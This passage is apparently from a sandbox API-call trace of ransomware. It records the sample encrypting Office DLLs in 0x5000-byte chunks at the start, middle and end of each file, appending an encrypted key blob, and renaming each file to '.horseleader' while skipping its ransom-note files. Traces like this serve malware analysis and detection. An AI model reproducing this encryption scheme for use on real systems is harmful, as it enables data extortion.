(lpFirst="MSOINTL.DLL", lpSrch=".horseleader") returned 0x0 [0236.972] lstrcmpW (lpString1="MSOINTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0236.972] lstrcmpW (lpString1="MSOINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0236.972] lstrlenW (lpString=".testttjffg") returned 11 [0236.973] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\1033\\MSOINTL.DLL", lpSrch=".testttjffg") returned 0x0 [0236.973] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0236.973] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0236.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0236.973] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 76 [0236.973] StrStrW (lpFirst="MSOINTL.DLL", lpSrch=".txt") returned 0x0 [0236.973] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2528128) returned 1 [0236.974] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.974] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.976] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.976] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.976] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x1321c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0236.976] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.983] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.983] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.983] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x264380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.983] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.996] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.996] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.006] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.007] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.007] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.007] CloseHandle (hObject=0x1a4) returned 1 [0237.018] GetProcessHeap () returned 0x780000 [0237.019] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.019] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.horseleader") returned 88 [0237.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.horseleader")) returned 1 [0237.020] GetProcessHeap () returned 0x780000 [0237.020] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.020] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b30dd00, ftCreationTime.dwHighDateTime=0x1cac9ab, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5b30dd00, ftLastWriteTime.dwHighDateTime=0x1cac9ab, nFileSizeHigh=0x0, nFileSizeLow=0xd980, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="MSOINTL.DLL.IDX_DLL", cAlternateFileName="MSOINT~1.IDX")) returned 1 [0237.020] lstrcmpiW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="Windows") returned -1 [0237.020] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 84 [0237.020] StrStrIW (lpFirst="MSOINTL.DLL.IDX_DLL", lpSrch=".horseleader") 
returned 0x0 [0237.020] lstrcmpW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="#Decrypt#.txt") returned 1 [0237.020] lstrcmpW (lpString1="MSOINTL.DLL.IDX_DLL", lpString2="_uninstalling_.png") returned 1 [0237.020] lstrlenW (lpString=".testttjffg") returned 11 [0237.020] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL", lpSrch=".testttjffg") returned 0x0 [0237.021] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.021] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.022] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 84 [0237.022] StrStrW (lpFirst="MSOINTL.DLL.IDX_DLL", lpSrch=".txt") returned 0x0 [0237.022] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=55680) returned 1 [0237.022] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.026] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.027] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.027] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.028] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.028] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.028] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3980, lpOverlapped=0x0) returned 1 [0237.028] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc680, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.028] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3980, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3980, lpOverlapped=0x0) returned 1 [0237.029] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.029] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.029] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) 
returned 1 [0237.029] CloseHandle (hObject=0x1a4) returned 1 [0237.029] GetProcessHeap () returned 0x780000 [0237.029] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.030] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.horseleader") returned 96 [0237.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.horseleader")) returned 1 [0237.031] GetProcessHeap () returned 0x780000 [0237.031] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.031] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c620a00, ftCreationTime.dwHighDateTime=0x1cac9ab, ftLastAccessTime.dwLowDateTime=0xeee8f1b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5c620a00, ftLastWriteTime.dwHighDateTime=0x1cac9ab, nFileSizeHigh=0x0, nFileSizeLow=0x152f80, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="MSOINTL.REST.IDX_DLL", cAlternateFileName="MSOINT~2.IDX")) returned 1 [0237.031] lstrcmpiW (lpString1="MSOINTL.REST.IDX_DLL", lpString2="Windows") returned -1 [0237.031] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 85 [0237.031] StrStrIW (lpFirst="MSOINTL.REST.IDX_DLL", lpSrch=".horseleader") returned 0x0 [0237.031] lstrcmpW 
(lpString1="MSOINTL.REST.IDX_DLL", lpString2="#Decrypt#.txt") returned 1 [0237.031] lstrcmpW (lpString1="MSOINTL.REST.IDX_DLL", lpString2="_uninstalling_.png") returned 1 [0237.032] lstrlenW (lpString=".testttjffg") returned 11 [0237.032] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL", lpSrch=".testttjffg") returned 0x0 [0237.032] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.032] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.033] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 85 [0237.033] StrStrW (lpFirst="MSOINTL.REST.IDX_DLL", lpSrch=".txt") returned 0x0 [0237.033] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1388416) returned 1 [0237.033] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.033] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.038] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.039] 
WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.039] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa6fc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.039] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.042] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.042] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.042] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x14df80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.043] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.046] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.046] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.046] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.047] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.047] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.047] CloseHandle (hObject=0x1a4) returned 1 [0237.047] GetProcessHeap () returned 0x780000 [0237.047] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.047] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.horseleader") returned 97 [0237.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.horseleader")) returned 1 [0237.049] GetProcessHeap () returned 0x780000 [0237.049] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.049] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15d97a00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0xeeedb470, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x15d97a00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0xa388, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="MSSOAPR3.DLL", cAlternateFileName="")) 
returned 1 [0237.049] lstrcmpiW (lpString1="MSSOAPR3.DLL", lpString2="Windows") returned -1 [0237.049] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 77 [0237.049] StrStrIW (lpFirst="MSSOAPR3.DLL", lpSrch=".horseleader") returned 0x0 [0237.049] lstrcmpW (lpString1="MSSOAPR3.DLL", lpString2="#Decrypt#.txt") returned 1 [0237.049] lstrcmpW (lpString1="MSSOAPR3.DLL", lpString2="_uninstalling_.png") returned 1 [0237.049] lstrlenW (lpString=".testttjffg") returned 11 [0237.049] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL", lpSrch=".testttjffg") returned 0x0 [0237.049] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.049] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.049] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.051] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 77 [0237.051] StrStrW (lpFirst="MSSOAPR3.DLL", lpSrch=".txt") returned 0x0 [0237.051] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=41864) returned 1 [0237.051] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 
[0237.054] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.054] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.054] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.060] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.060] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.061] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x388, lpOverlapped=0x0) returned 1 [0237.061] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffc78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.061] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x388, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x388, lpOverlapped=0x0) returned 1 [0237.061] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.061] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.062] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.062] CloseHandle (hObject=0x1a4) returned 1 [0237.062] GetProcessHeap () returned 0x780000 [0237.062] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.062] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.horseleader") returned 89 [0237.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.horseleader")) returned 1 [0237.063] GetProcessHeap () returned 0x780000 [0237.064] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.064] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x356f9800, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x356f9800, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x2d88, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="OARPMANR.DLL", cAlternateFileName="")) returned 1 [0237.064] lstrcmpiW 